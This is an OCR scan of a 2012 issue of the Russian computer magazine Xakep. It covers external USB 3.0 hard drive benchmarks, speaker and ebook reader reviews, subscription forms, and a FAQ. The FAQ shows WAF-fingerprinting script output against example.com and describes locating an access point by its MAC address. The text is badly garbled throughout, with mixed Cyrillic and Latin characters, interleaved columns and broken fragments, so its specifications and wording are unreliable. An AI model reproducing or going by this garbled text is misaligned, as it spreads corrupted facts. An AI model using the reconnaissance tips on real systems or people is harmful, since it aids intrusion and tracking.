из набора РСМагk

Vantage.

Он << терзал » накоnители, за­

ежедневно сталкивается в обычной жиэни. Как общий результат

о на начинает сильно утомлять, причем не столько хозяина, сколько

в «nоnугаях>>, так и nромежуточные данные в Мб /с ты, опять же,

накопитель. Поэтому лучшим решением в некоторых ситуациях

сможешь лицезреть и сравнить между собой на графиках в самом

станут внешние жесткие диски, компактные, а самое главное, та­

конце статьи. Несомненно, стоило бы устроить и краш-тест для

кие же простые в обращении, как и флеш-накопители. Сегодня мы

nущей уверенности в том или ином девайсе, но, к сожалению, при­

сравним

шлось довольствоваться бенчмарками.

6 различных

мобильных запоминающих устройств.

ХАКЕР

03/158/2012


От <<в инта » l

ADATANH13 ткрывает тестирование стильный внешний жесткий диск от

В н а ш у лабораторию п о n ал черный ADATA 750 Г б, все г о же в линейке четыре диска: в черном корnусе на 500/750 Г б и в белом такого же объема. Чтобы

NH13

ADATA.

объемом

накоnитель nрослужил nодальше, nроизво д итель облачил его

в алюминий- и nрочность выше, чем у nластиковых внешних

HDD,

и смотрится достаточно солидно. На корnусе никаких кноnок или иных nрисnособлений, только ин д икатор активности да nорт

Mini

USB 3.0. В работе nоказал себя очень неnлохо - тихо, без чрезмерной

.,_

вибрации он на ура сnравился со всеми бенчмарками, которые выnали на его долю. Ч то касается комnлектации, то тут особого богатства ждать не стоит: в картонной уnако в ке ты отыщешь лишь кабель

USB 3.0 да

маленькую брошюрку с nо д сказками по исnоль­

зованию.

К

ADATA NH13 также

nрилагается и бесnлатный софт, который

можно скачать nосле регистрации на сайте . С nомощью одной из nредлагаемых nрограмм ты можешь сделать свой

вочным [если у тебя есть

HDD устано­ DVD с Windows 71, вторая nозволяет легко

и nросто nроизводить бэкаn выбранных файлов.

SEAGATE STAA1500100 << внешником>> от

Seagate

не всё настолько же nро сто. Да ,

с виду это всё тот же сnичечный коробок-nереросток в ти­ nичном черном глян ц евом корnусе, но вот от собратьев его кое-что отличает. Всё дело в том, что устройства линейки

GoFiex

исnользуют в качестве интерфейса для nередачи данных модифи­ цированный SATA-nopт, несовместимый с обычным

SATA.

К нем у

уже nодключаются сменные модули-контроллеры интерфейсов, таких как, наnример,

USB второй или третей ревизии, eSATA или 800. В комnлекте с Seagate STAA1500100 nоставляетмодуль с USB 3.0. Остальные модули , если они тебе нужны,

F iгeWiгe ся

ты можешь nриобрести отдельно- на свой вкус. Сам внешний диск

Seagate STAA1500100

оказался тяжелее и толще все х других

участвовавших в нашем сравнительном тестировании устройств . Это неудивительно, ведь он может вместить целых

1,5 Тб

nолезной

или не очень информации . Стоит «ВИНТ>> соответственно, однако среди nрочих участников теста он обладает самой низкой ценой за условный гигабайт.

ХАКЕР

03/158/2012

131


FERRUM

SILICON POWER

SP750GBPHDS20SЗU

1]

торой диск с шильдиком

Silicon Роwег, nринявший у частие HDD стал немного агрессивнее.

в т ес тировании. Внешний вид

Фиолетовый корnус смотрится неnлохо среди моря черных

« Внешников ». Если nродолжать аналогию с авто, синий индикатор

активности находится на <<каnоте » . Порт

Mini USB 3.0 здесь также

рас­

nоложен на боку, nоэтому nридется вытаскивать диск из прилагаемого

че х ла , чтобы подключить кабель. К нам в лабораторию nришла мод е ль

об ъемом 750 Гб, но в серию входят еще три вариации с объемом от 500 д о 1000 Гб- самые ходовые ныне «размеры » . Стандартная комnлек-

li>

тация здесь немного дополнена: кроме кабеля, е с ть и чехол, такой же незамысловатый, как и у

Silicon

Роwег

SP640GBPHDS10S3N.

При про­

хо ждении полосы препятствий-бенчмарков диск показал себя очень д остой но : не может не радовать, ч то красотадевайсане является

е г о е дин с твенным плюсом. К ус тр о йству прилагает с я такой же софт, к а к у младшей модели, но , мы д у маем , ты уже и сам догадываешься ,

к а ко вы е го основные функции .

TRANSCEND TS1TSJ25HЗP

m

а конец, мы дошли до «внешни к а >>, в не которой степени защищенного от пагубного влияния внешней среды . Наnри­

мер, от кривых р у к, всё время норовящих уронить устройство

на твердую поверхность .

~

Tгanscend производит и имиджевые « винты » , но всё же более и з вестна именно по моделям с пластиковым корnусом , оснащенным

р ези новым покрытием . К тому же на корпусе присутствует та самая к н о nка для ленивых , выполняющая автоматиче с кий бэкап данных .

Далее всё более тривиально: интерфейс передачи данных

USB 3.0,

в к о мплект входят кабель и руковод с тво пользователя . Забыли у помя­ нуть про дизайн- нам он чем-то напомнил уютный бабушкин свитер сnокойного серого и фиолетового тонов . Правда, баб у шкин свитер не может х ранить

1 Тб

данных, как Tгanscend TS1ТSJ25H 3 P. К слову,

есть мод е ли с меньшим объемом

[500 или 750 Г б ], которые , соответ­

ственн о, с тоят д е шевле.

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ

ADATA NH13

DS20SЗU

Емкость:

750

Форм фактор: Интерфейс: Размеры:

2.5"

1,5 Т б 2,5"

USB 3.0

USB 3.0

77х16х 11 8мм

Масса :

165 г

89 х 120 х 22 мм 280 г

132

Slllcon Power SP750GBPH-

Seagate STAA1500100

Гб

750 Г б 2,5" USB 3.0 80 х 21 х 142 мм 160 г

ХАКЕР

03/158/ 2012


VERBATIM 53035 ще один яркий д иск в н ашей тестовой лаборатории­ кис л отно - розовый Veгbatim

53035.

П о п рав д е г ово р я, вся

линейка Stoгe'n'Go сделана для в есельчаков. В ней присут­ ствуют модели зеленого, лазурного, желтого, оранжевого и фиолето ­ вого цвета. В се они очень яркие, хоть развешивай их на елке вместо

новогодних игрушек . Обидно, что такой краси вы й корпус Veгbatim

53035

сделан из пластика, пускай даже это характер н о дл я большин­

ства внешних

HDD . Всё,

что т ы сможешь н айти с н аружи, - э т о си н ий

индикатор актив н ости и порт

Mini USB 3.0.

Кроме в н еш н его ви д а,

« ВИНТ>> также может похвастаться завидной вместительностью в

1 Тб,

благодаря чему с собой в дорогу можно взять ну очень много всего .

11>

И конечно, в первую очередь нас порадовала произ в одительность

-

Veгbatim

53035

единственный смог удержаться в тройке лидеров

на протяжении всех наших тестов.

Также необходимо отметить софт : в комплекте предоста вл яется несколько у т илит от Nего, а также программа Gгeen

Button, которая

может показаться очень полезной владельцам ноутбуков. С ее по­ мощью можно самос тоятельно настраивать время , спустя которое

внешний жесткий диск буд ет уходить в ж д ущий режим . Но если ты не доверяе ш ь автоматике, можешь дваж д ы щ елкнуть по значку n р о ­ граммы, и накопитель тут же «заснет>>.

WESTERN DIGITAL WDBACX0010BBK авершает тестирование nр о дукт комnании, кото р ая более чем известна на рынке жестких диско в . Л и н ейк аМ у Pa ss p oг t

Esse ntial SE тоже

вк л ючае т в себя н а к опи т е л и р аз ны х, н о всё

же более консер в а т ивных ц ветов: че рн ого, се р о г о, г о л у б о г о и к р ас ного. Корпус устройства имеет обтекаемую форму, бл а го даря ч ему

.,.

его , кстати, удобнее класть в карман. Н икаких лишних н ав а р отав мы не нашли: на корпусе в сё так же имее т ся лишь логоти п компа н ии­

производи т еля, пор т

Mini USB 3.0

д а ма л ен ь кий бе л ый ин д икатор

работы. Сре д и накопителей серии Му P asspo г t

<<терабай тни ки>>, т ак и устройства н а

75 0 Г б.

Essential SE

ес ть как

П олу т о рат е р абай т ная

<<высота>> крупнейшему п роизводите л ю жес т ких диско в п о каким-то причинам пока не покорилась, прав д а, речь идет только о в н е ш них

2,5-дюймовых

HDD.

Но и

1000

Гб - это немало, т ем бо л ее дл я <<в н еш­

ника>>. П о крайней мере, д ля создания р езе р вных ко п ий д а нн ых т акого

объема хватит за глаза. А упростит э т о т п ро ц есс с п е ц иа льны й софт, ко т ор ы й п ри л а г ается ко всем <<вне шн ик а м>> э т ой лине й ки . Н е обо­ шл ось и без минусо в , к кот о ры м от н оси т ся д оволь н о м ар к и й кор п ус и не самые лучшие показа т ели п роиз в о д ител ьн ости.

AWARDS Transcend

Verbatim 53035

Western Digital WDBACX0010BBK

TSПSJ25H3P

П осле всей болтов н и, всех срав н ений, тес т о в и п р очего мы вплот н ую по д хо д им к н аг р аж д е н ию .

Тебе еще п ре д с т оит п ознакоми т ьс я с п о др обными о п иса н иями учас т нико в т еста, н о ка рты , то есть

1 Тб

2,5" USB 3.0 81 х22х131

мм

256 г

1 Тб 2,5"

1 Тб 2,5"

USB 3.0 82 х 20 х 127 мм 185 г

83х18х110мм

USB 3.0 200 г

р езул ьта т ы, мы ра ск р оем с р азу. Ит ак, << Вы бо р ом ре д акции>>, безусло вн о, ста л ш ус тры й и в мес т и ­ тельный Veгbatim

лучае т

ХАКЕР

03/158/2012

53035.

П риз << Л уч ш а я n оку п ка>>,

отмечающий нечто вро д е золотой се р е д ины, по­

Silicon

Р оwег

SP750G BPHDS20S3U . :J:

133


FERRUM

&АЛЛЫ

PCMARK VANTAGE,

ТЕМПЕРАТУРА, 0 (

Гбайт

ADATA NH13 750

ADATA NH13 750

Гбайт

Seagate STAA 1500100

Seagate ST Ад 1500100

Silicon Power SP750GBPHDS20S3U

Silicon Power SP750GBPHDS20S3U

Transcend

ТS1ТSJ25НЗР

Transcend

ТS1ТSJ25НЗР

Verbatim 53035

Verbatim 53035

Western Digital WDBACX001 ОВВК

Western Digital WDBACX001 ОВВК о

Результаты

10 15 20 25 30 35 40 45

Температура у всех испытуемых была в норме даже после nрохожде ния всех

PCMark Vantage трудно трактовать двусмысленно

тестов, если, к онечно , верить показаниям встроенны х температурных датчиков

PCMARK VANTAGE, М&АЙТ/С

HD TUNE PRO (WRITE), М&АЙТ/С

ADATA NH1 3 750

Гбайт

ADATA NH13 750

Гбайт

Seagate STAA 1500100

Seagate STAA 1500100

Silicon Power SP750GBPHDS20S3U

Silicon Power SP750GBPH DS20S3U

Transcend

Transcend

ТS1ТSJ25НЗР

ТS1ТSJ25НЗР

Verbatim 53035 Verbatim 53035

Weste r n Digital WDBACX001 ОВВК

Western Digital WDBACX001 ОВВК •

WindowsOefender

• •

Gaming

!~prot1ng 0

1

Pittures to Windows photo Gallery 1

: ~d"e~ :d~~~~~~:i~; ~ndows Movie Market • •

о

10

20

30

40

50

60

70

1

1

1

1

1

1

20 40 60 80 100 120 140

• НО Tune Pro [Write], М байт/с мин .

• НО Tune Pro [Write), М байт/с макс . • НО Tune Pro [Write], М байт/с сред.

80

Windows Media Center Adding music to Windows Media Player Applicationloading

Если какой -то из участников не отличился в скорости чтения , то и с записью

Телерь nодробнее: сравним результаты каждого из nодтестов

дело обстоит не лучше . И наоборот

HD TUNE PRO (READ), М&АЙТ/С

ADATA NH13 750

Гбайт

Seagate STAA 1500100 Silicon Power SP750GBPHDS20S3U Transcend

TS1ТSJ25H3P

Verbatim 53035 Western Digital WDBACX0010BBK • НО Tune Pro ]Read], Мбайт/с иин . • НО Tune Pro ]Read], Мбайт/с макс. 8 НО Tune Pro IRead], Мбайт/с сред.

1

о

20

1

1

1

40

60

80

1

100

1

1

120

140

Три скорости последовательного чтения : минимальная, максимальная и средняя

ХАКЕР

03/158/2012


MUGELLO - HYPER SILVER

VAIRANO

INDY 500

SILVERSTONE

NARDO

ROTARY FORGED WHEELS

MALLORY

CARTHAGE

SEPANG

ZOLDER

NURBURGRING RF

VALENCIA

CADWELL

INTERLAGOS RF

МАХ

BROOKLANDS

STOWE

LONDRINA

JARAMA

SNEПERTON

DONINGTON

WILLOW

STRIP

Visit our website to view the complete line of TSW Wheels

TSW is dedicated to being the world 's premium provider of staggered wheel applications and has more one-piece staggered wheel sizes than any other wheel brand in the world .

Реклама


FERRUM

Сергей nлотников

Общая выходная мощность:

RMS 25

Вт+

Вт

25

ITHD + N = 10%1 Сигнал-шум: > 85 дБА Искажения: < 0,05 % Частотная характеристика: 20 Гц- 20 кГц Входная чувствительность: 700 ± 100 мВ Управление: громкость, выбор входа, FМ­ настройки, навигация

Динамик НЧ: 5,751148 ммl, магнитное экранирование, 6 Ом, порт ФИ Динамик ВЧ : 1 125 ммl, твитеры с шелковым куполом, магнитное экранирование, 6 Ом

318 х 191 х 284 мм; 318 х 186 х 271 мм RСА-входа IRCA-RCA и RCA для

Размеры: активная колонка: пассивная колонка:

Тип входа: два входа AUXI, FМ-радио, 50-карта, USВ-вход Масса: 11 кг

EDIFIER R2500 ОБЗОР УНИВЕРСАЛЬНОЙ АКТИВНОЙ СТЕРЕОСИСТЕМЫ 2.0 Как утверждает на своем сайте компания

акустику с глаз долой будет настоящим пре­

l:l§l:lei!CD

Ed ifieг, модель активной стереосистемы

ступлением.

Погов орим о звуке, точнее , о его качестве.

2.0

R2500 [или Studio 5) идеально п одходит для

Сбоку на одной из колонок Edifieг

дома, студии и офиса. И с этим, пожалуй, тя­

дится цифровой модуль управления. Он позв о­

жело не согласиться, разве что для офисного

ляет менять параметры акустической системы

шивания музыки. Акустика прост о создана

клерка колонки слегка великоваты. Но, с др у­

[вы бор входа, регулировка громкости, переме­

для это гоl В общем, низкие и высокие частоты

гой стороны, кто мешает тебе стать начальни­

щение по записям и настройка FМ- станций),

звучат довольно ровно. Завалов мы не за­

ком и обзавестись собственным кабинетом?

а также подключать накопители с музыкаль­

метили. При этом любая композиция вос­

Да, Edifieг

ными файлами к USВ-порту и 50-слоту. Edifieг

производится весьма и весьма объемно. Е сли

R2500

однозначно облагоро дит

нахо­

R2500

На наш взгляд, стереосистема Edifieг

R2500

является идеальным решением для проел у­

любую комнату и отлич но впишется в любой

R2500

интерьер. А всё из-за строгого, но приеле­

Сами разъемы спрятаны в отодвигающемся

отлично справляется с большинством жанров.

кательного внешнего вида . Акустическая

«Карма шке >>. Удобно и практично.

И роковые рифы, и классика, и «элек тронная >>

система Edifieг

Подключить акустику к источнику не со­

музыка- композиции звучат без искажений .

черного цвета. Остальные элементы также

ставляет проблем. Стереосистема осна щена

Стереосистема неплохо проявила себя в играх и фильмах . Но для подобного рода развлече­

R2500

изготовлена из

MDF

поддерживает форматы МРЗ и

WMA.

выполнены в сходной цветовой палитре.

дв умя RСА-в ходами

Динамики прикрыты полупрозрачной тканью,

а также входом для FМ-ради о. В итоге Edifieг

[RCA-RC A и RCA для AUX),

лишь 5,75-дюймовый НЧ-динамик выделяется

R2500

можно подготовить к работе за считан ­

говорить более конкретно, то Edifieг

R250 0

ний идеальным решением, на наш взгляд, всё

же являются акустические системы формата

серебристо-белым цвет ом.

ные секунды после распаковки.

2.1

Чуть не забыли упомянуть о габаритах устрой­

Активная стереосистема имеет суммарную

домашних усло вия х и т ем более в офисных и

мо щн ость

студийных п омещениях не всегда оправданно .

ства. Для того чтобы разместить Ed ifieг

R2500

50

Вт, которая достигается благо­

и

5.1.

Др угое дело, что их использование в

на столе, придется расчистить достаточно

даря паре дюймовых ВЧ-динамиков и паре

Зато такие , как Ed ifieг

много свободного про с транства. Идеаль-

5,75-дюймовых НЧ-динамик ов. Все динамики

мальным выборомl :х:

ным решением станет установка колонок на

харак тери зуются сопротивлением

специальные под ставки. Спрятать же такую

ют магнитное экранирование.

136

6 Ом

R2500,

являются опти­

и име­

ХАКЕР

03/158/2012


ГОДОВАЯ экономия

Подписка 1.

Разборчиво заполни подписной купон и кви­ танцию, вырезав их из журнала, сделав ксе­

рокопию 1-1ли распечатав с сайта

2. Оплати 3. Вышли

shop.glc.ru .

подписку через любой банк. в редакцию копию подписных доку­

500

12 НОМЕРОВ 6 НОМЕРОВ

2200 1260

руб.

РУБ. РУБ.

ментов- купона и квитанции- любым из

УЗНАЙ, КАК САМОСТОЯТЕЛЬНО ПОЛУЧИТЬ

нижеперечисленных способов:

ЖУРНАЛ НАМНОГО ДЕШЕВЛЕ!

• на e-mail: subscribefaglc.ru; • по факсу: [495] 545-09-06; • почтой по адресу: 115280, Москва, ул . Ленинская Слобода, 19, Омега плаза, 5 эт., офис NQ 21,

000

ПРИ ПОДПИСКЕ НА КОМПЛЕКТ ЖУРНАЛОВ ЖЕЛЕЗО+ ХАКЕР+

2 DVD:162 РУБЛЯ

ОДИН НОМЕР ВСЕГО ЗА

«Гейм Лэнд», отдел подписки.

[НА

ВНИМАНИЕ! ЕСЛИ ПРОИЗВЕСТИ

35% ДЕШЕВЛЕ , ЧЕМ В РОЗНИЦУ]

М ОЖНО ОФОРМИТЬ С НОЯБРЯ .

ЗА 12 МЕСЯЦЕВ 3890 РУБЛЕЙ (24 НОМЕРА] ЗА 6 МЕСЯЦЕВ 2205 РУБЛЕЙ (12 НОМЕРОВ]

ЕДИ Н АЯ ЦЕН А П О ВСЕЙ РО С СИИ . Д О СТАВКА

ЕСТЬ ВОПРОСЫ? Пиши на info0glc.гu или звони по бесплатным телефо­

О ПЛАТУ В СЕНТЯБРЕ, ТО ПОДПИСКУ

ЗА СЧ ЕТ И З Д АТЕЛЯ , В ТО М ЧИСЛЕ КУ РЬЕРОМ

нам

ПО МОС КВЕ В ПРЕДЕЛАХ М К АД

други х регионов России, абонентов сетей МТС, БиЛайн и Мегафон).

8[495)663-82-77

[для москвичей) и В

[800) 200-3-999

[для жителей

ПОДПИСНОЙ КУПОН ПРОШУ ОФОРМИТЬ ПОДПИСКУ НА ЖУРНАЛ « ХАКЕР •

D D

на

6

на

12

месяцев

н ачиная с

D

месяцев

_

_

_ __ __ _ 201

Извещение г.

ИНН

7729410015

000

«Гейм Лэнд»

ОАО «Нордеа Банк>>, г. Москва

Доставлять )i(УРНал по почте

р/с

No 40702810509000132297

к/с

No 30101810900000000990

надомашнии адрес

БИК

Доставлять журнал курьером:

D D

Плательщик

на домашний адрес**

Адрес (с индексом)

(от м еть квадрат выбранного варианта подписки )

кпп

044583990

на адрес офиса*

770401001

Сумма

Назначение платежа Оплата журнала<< _ __ __ _ _ >>

Ф.И . О.

2012 г.

с

Кассир

Ф.И.О. Подпись плательщика

АДРЕС ДОСТАВКИ: индекс

Квитанция

ИНН

7729410015

000

«Гейм ЛЭНД »

ОАО <<Нордеа Банк>>, г. Москва

ДОМ

No 40702810509000132297

к/с

No 30101810900000000990

корпус

БИК

квартира/офис телефон

р/с

(

770401001

Адрес (с индексом)

e-mail сумма оплаты

Сумма

Назначение платежа

"'в свободном nоле укажи назван и е фи рмы

Оплата журнала<< _ _ _ _ _ _ _.>>

и друrую необходимую информацию

• • в свободном nол е укажи друrую необходимую и нформаци ю с

и альтернати вный вариант доставки в случ а е отсутствия дома

1свободное

кпп

044583990

Плательщик

поле

Ф.И.О.

Кассир

Подпись плательщика

2012 г.


FERRUM

Сергей Никитин

WEXLER.BOOK Т7055 И ШВЕЦ , И ЖНЕЦ, И НА ДУДЕ И ГРЕЦ С ЦВЕТНЫМ СЕНСОРНЫМ Д ИСПЛЕЕМ Технический прогресс nре д остав л яе т нам ши­ рочайшие возможности д ля решения во п роса о том, чем же заняться п о п у т и на работу, учебу или в дли т ель н ом путешествии. П орта­ тивные электронные устройс т ва п озволяют нам слушать музыку, смотреть фотографии и фильмы или читать электрон н ые книги, ког­ да х очется чего-то более интеллек т уального .

WEXLER.BOOK Т7055

как раз nо д ой д ет «nоли­

глоту», следящему за новинками ин д ус т рии.

Забота компании опокупателях чувствуется сразу после распаковки устройства : поми -

Экран : цветной, се н со рный , т·,

LED

Встроенная память : В Г б Дополнительная память: micгoSD, до 32 Г б Форма т ы те к ста : ANSI, Unicode, ТХТ, PDF,

HTML, PDB, EPU B, FB2, DJVU, DOC WMA, FLAC, ААС , WAV, OGG Форматы изобра ж ений: JPG, ВМР, GIF Форматы видео : WMV, RM , AVI, RMVB, 3GP, FLV, МР4, DAT, VO B, MPG, MPEG, MKV, MOV Форматы аудио: МР 3,

Дополнительно: F М- рад ио Габариты : 190 х 125 х 11,5 мм Масса :

315 г

мо всех н еобходимых проводов и кабелей, а также удобного кожаного чехла, надеж н о защищающего

WEXLE R.BOOK

Т7055 от влия ­

ния внешней среды, в комплект поставки

входит несколько сертификатов на бесп л ат­ ное скачивание электронных к н иг в круп н ых

ПЛЮСЫ И ЮiНУС Ы + Качественный экра н +Много функций и поддерживаемых форматов +Низкая стоимость

онлайн-магазинах. П ора переходить к циви­ лизованному отношению к чужой ин т еллекту­ альной собственности!

П осле включе н ия само г о устройс т ва, как,

впрочем, и в процессе дальнейшей работы с ним, тоже испытываешь только приятные

ощущения. Е с т естве н но, первое, н а что об­ ращаешь самое присталь н ое внимание,- это

экран, особенно если о н ц вет н ой и сенсор­ ный, как у

WEXL ER .BOOK Т7 055 .

С меем тебя

заверить : с экраном тут всё в порядке ! Ц ве т а

натуральные и яркие, изображение четкое, ч то особенно важно е щ е и потому, что, п омимо

благо д аря которому о риентац и я изоб р аже ­

I:I§I:I•I!W

текстовых файлов, эта чи т алка также умеет

ния на экра н е ав т ома т ически ме н яется, как

Очеви д но, что элек т ро н ная книга

работать с видео и фо т ографиями, н е говоря

у планшетов и с м а р тфонов.

В ООК Т7 05 5 уд а л ась. Б о л ь ш ой ц ве т ной эк р ан

уже об аудио практически в сех рас п рос т ра­

В осьми гигабай т вс тр оенной п амяти

WEXLE R.

о тличается высоким ка ч еством. Ус т ройство

ненных форматов. Н о раз произво д итель н а­

д о л жно хва т и т ь для хра н ения всех ш едевров

об л а д ает множес т вом фу н кций. Е с т ь д аже

звал свое устройство электронной кни г ой, то

мировой лите р атуры, а ос т альные мульти­

встроенный словарь и п росте н ькие игры.

не будем с ним спорить. Тем бо л ее чт о читать

ме д ий н ые ф а й л ы мож н о «ск л а д и р о в ать>>

с ее помощью дейс т витель н о удобно - глаза

на кар т ах п ам ят и micгoS D об ъ емом д о

32

П ри э т ом ч италку удобно ис п ользов а ть,

Г б.

а ком п лект пос т а в ки включает в себя всё

не устают, и д аже при «nерелистывании>>

Р аботат ь со в сей б и б ли о т екой, как, в п рочем,

необхо д имое и д аже бо л ьше. П оддержка кар т

стра н иц не возникает неприя т ных ощу щ е н ий.

и с самим уст р ойс т вом, т ебе буд ет оче н ь про­

пам я ти по п ул ярного формата micгoS D также

К тому же Т FТ-ри д еры рассчитаны как раз

сто бла г одаря п ро д ума нн ому меню и удоб н ым

н е буд е т л и шн ей. В общем, владелец

на использование в поме щ е н иях с н е д ос т а ­

элеме н там уп р а в ле н и я . Также о т метим н а ­

В ООК Т705 5 вряд ли заскучает в д ол г ой д о­

точным освещением. Д ля большего уд обства

личие вст р ое н но г о FМ-пр ием н ика с фу н к ц ией

ро г е. К его услугам книги, фо т ог р афии, ви д ео

WEXLER .BOOK Т 7055

записи.

и F М-ра д ио.

138

осна щ ен G - сенсором,

WEXLE R.

:Х:

ХАКЕР

02/ 157/201 2


(gameJiand ПОДПИШИСЬ! shop.glc.ru Редакционная подписка без посредников это

гарантия

получения

важного

для

-

Вас

журнала и экономия до 40о/о от розничной цены в киоске

6 номеров - 111 О руб. 13 номеров - 1999 руб.

6 13

номеров номеров

-

564 руб. 11 05 руб.

6 номеров - 111 О руб. 13 номеров - 1999 руб.

6

13

l

6 13

номеров

6 13

номеров

номеров

номеров

номеров номеров

- 111 О руб. - 1999 руб.

•:.t.O.мt?б!I'ТUtiiiiiR~'ICJC*

;=--

~=-- ~...

-

630 руб. 1140 руб.

6 13

номеров

-

690 руб. 1249 руб.

6

номеров

13

номеров

номеров

8-800-200-3-999 +7 (495) 663-82-77 (бесплатно)

6

номеров

13

номеров

-

81 О

руб.

1499

руб.

i!rJ_.~

895 руб. 1699 руб.

-

775

руб.

1399

руб.

номеров

- 111 О руб. - 1999 руб.

XVJIИГIJH

;.~-:;.:;-

-

номеров

6

13

6 номеров - 1194 руб. 13 номеров - 2149 руб.

6 13

номеров номеров

-

950 руб. 1699 руб.

6 13

6

13

номеров номеров

-

894 руб. 1 699 руб.

номеров-

810

номеров

1499

-

руб. руб.


UNITS/ FAQ UNITED

Степан Ильин

ltwtitter.com/stepahl ·

FAQ United

ЕСТЬ ВОПРОСЫ- ПРИСЫЛАЙ НА

r.1

FAQriREAL.XAKEP.RU

ЕСТЬ ЛИ СПОСОБ БЫСТРО ПРОКАЧАТЬ

n

Разумеется! Каждый

WAF характе ризу-

ется о пр еделенными <<отпечатками

И з у нив ерсаль ны х назову ту л зу WAFWOOF [code .google .com/p/waffitl, которая может по­

lt,;,l АККАУНТ НА OROPBOX .COM. ТО ЕСТЬ

181

У ВЕЛИЧИТЬ ДОСТУПНЫЙ ОБЪЕМ ,

пальцев», по которым его можно опозна ть .

хвастаться сиг нат у рами для выявл ения сразу

НЕ ПРИБЕГАЯ К РАЗНЫМИ ЧИТЕРСКИМ

В Сети можно найти специальные утилиты,

нескольки х

СПОСОБАМ? ВЫ О НИХ ПИСАЛИ- Я ИХ

правда , в большинстве своем у зкоспециализи­

исходников, поэт ому их н ужно загружать из ре ­

ЗНАЮ!

рованные , направленны е на выявление

позитория

n

181

пол учи ть дополнительн о 4,5 Гб за счет

участия в бета -те стировании нового функциа ­

SVN.

lmp eгva

МОГ У Т ОПРЕДЕЛИТЬ, ГДЕ НАХОДИТСЯ

WA F:

КОНКР ЕТНОЕ УС ТРОЙСТВО, ПО ЕГО # . / imperva-detect.sh https: // www.

и видео с внешних накопителе й. Ид ея в том ,

example.com

МАС-АДРЕСУ?

n

чтобы предоставить пользователю механизм, в <<облако» при подключении к компьютеру

Testing (https://www.example . com] for presence of application firewall

фотоаппарата или карты памяти . П ощупать нов ую опцию, а заодно пол учить

Мб

500

к объему дост упного дискового про странства

в ОгорЬох за каждые загруженные

500

Мб

изображений можно уже сейчас. Для этого нужно загрузить тестовый билд ОгорЬо х, взяв его из спе циальной ветки на форуме сервиса

[ Ьit.ly/AEhbvD I. Помимо этого, в

AutoPiay [меню,

которое появляет ся, когда система обнаружи­

вает новый внешний носитель! необ хо димо прописать ОгорЬох. В

Windows 7 эта

д ос тупна в Contгol Рапе!

-7 Autoplay,

-7

функция

Нагdwаге

and Sound

а в ХР включается в контекстном

Test е- Good User Agent ... 1 application firewall possiЬly present Test 1- Web Leech User Agent ... 1 application firewal l possiЫy present Test 2 - E-mail Collector Robot User 1 application firewall possiЫy present Test 3 - BlueCoat Proxy Manipulation 1 application firewa l l possiЫy present Test 4 - Web Worm Bloc king ... 1 application firewall not detected Test 5- XSS Blocking ..• 1 application firewall possiЫy present

lt,;,l НА ХОСТЕ ИСПОЛЬЗУЕТСЯ WAF [ФАЙЕРВОЛ ДЛЯ ВЕБ-ПРИЛОЖЕНИЙI ?

181

Да какие уж там право охрани т ельные

органыl По смотр иМАС-адрес с в оей

точки доступа и попробуй поискать его в базах

геолокационных сервисов вроде Goog le Location Seгvices [samy.pl/mapxssl и Skyhook

[ www. s k y h ookwiгe l ess . com l. Думаю, даже они смогут указать местопо ложение устройства с nугающе й точностью. Е стественно, в базах может не оказаться запроше нного МАС-адре са, а пол ожение точки доступа вполне может

изменить ся, о днако вероятность обнаружить ее оче нь велика. Чтобы ты пон имал, эти базы активно п о п олняются за счет огромного

количества мобиль ны х устройств, которые анонимно отправляют на се рвера

Google

информацию о тек у щем расположении,

на хо дящи хся поблизос т и сото вы х станциях

меню каждого отдельного накопителя .

МОЖНО ЛИ ОПРЕДЕЛИТЬ , ЧТО

ДЕ ЙСТВИТЕЛЬНО ЛИ СЕЙЧАС

lt,;,l ПРАВООХРАНИТЕЛЬНЫЕ ОРГАНЫ

удобные фишки для загрузки фотографий

автоматически загружающий изображен ия

r.1

позволяетвыявитьиспольэованиеиэвестного

нала сервиса. D гopbox . com вводит новые

r.1

На официальном сайте нет

конкретных

Именно сейчас есть возможн ос ть

WAF. Н апример, тулза impeгvadetect 1cod е .goog le .com/p/i т peгva-detect l

WAF.

и точках доступа

--- Tests Finished оп [https: // www. example.com] 4 out of S tests indicate Imperva application firewall present ---

r.1

Wi-Fi.

КАКИМ ОБРАЗОМ МОЖНО

lt,;,l А Н АЛИЗИРОВАТЬ ПРОШИВКИ ДЛЯ

КАК СДЕЛАТЬ СОВРЕМЕННЫЙ ИНТЕРФЕЙС ДЛЯ ВЕБ-ПРИЛОЖЕНИЯ ЗА 15 МИНУТ

с

овременные веб-приложения за дают очень высокую планк у п о качеству

1

Широ ко изв ес тная компания Twitteг бесплатно предлагает всем с в ой

Ul-

2

Все злемен ты интерфейса гибкие. Компоненты корректно, без искаже­

д олже н быть красивым - он должен коррек ­

фреймворк Bootstгap [ twitteг. g i thub. com/bootstгap l. Ра зработка позволяет соз да­

решения х экрана и на различных ус тро йствах.

тно отображаться во всех браузерах и под­

вать отличные интерфейсы сайто в эа счи тан­

Инт ерфейс на B ootstгap одинаково хоро ш о

держиват ь современные технол о гии

ные часы [пр оверено на собственном опыте!

выглядит как на десктоnе, та к и на планшете

С н уля программировать все стили и скрипты

на основе готовых элементов и эко номить

или смартфоне. К тому же B ootstгap поддержи­

муторно . К счастью, есть отличные стартовые

о гро мное количество времени на адаптации

вает разные сетки, в том числе модную сейчас

наборы для создания Ul-прилож ений .

кода для разны х браузеров [даже

940-пиксельную.

11.0

интерфейса . Последний не только

HTML5.

IE71 .

ний, отображаю т ся при разных раз­

ХАКЕР

03/158/2012


FAQ UNITED

РАЗЛИЧНЫХ УСТРОЙСТВ? ОПРЕДЕЛЯТЬ, КАК ОДНА ВЕРСИЯ ИЗМЕНИЛАСЬ

БОЛЬШОЙ ВОПРОС

ПО СРАВНЕНИЮ С ДРУГОЙ?

n

в двух словах на этот вопрос не ответить.

181

Но подскажу полезный инструмент для

Q

подобных исследований- Binwalk lc ode. google . co m /p/Ьinw al k ~. Эта утилита предназначена для

ВОПРОС ОТ НАЧИНАЮЩЕГО

пример Dklab_Realplexoг ldkla b . г u /li b /

ВЕБ - ПРОГРАММИСТА . НА САЙТЕ

dklab гealplexoг l или Socket.IO lsocket. ]QI. Если Dklab_ Realplexoг у же готовый

НЕОБХОДИМО РЕАЛИЗОВАТЬ

поиска отдельных файлов и исnолняемого кода

РЕАЛ-ТАЙМ ВЗАИМОДЕЙСТВИЕ С ПОЛЬ­

продук т, который <<за ведется >> сразу

внутри заданного образа, при этом она заточена

ЗОВАТЕЛЯМИ . ДАННЫЕ НЕОБХОДИМО

после установки на сайте !если он у тебя

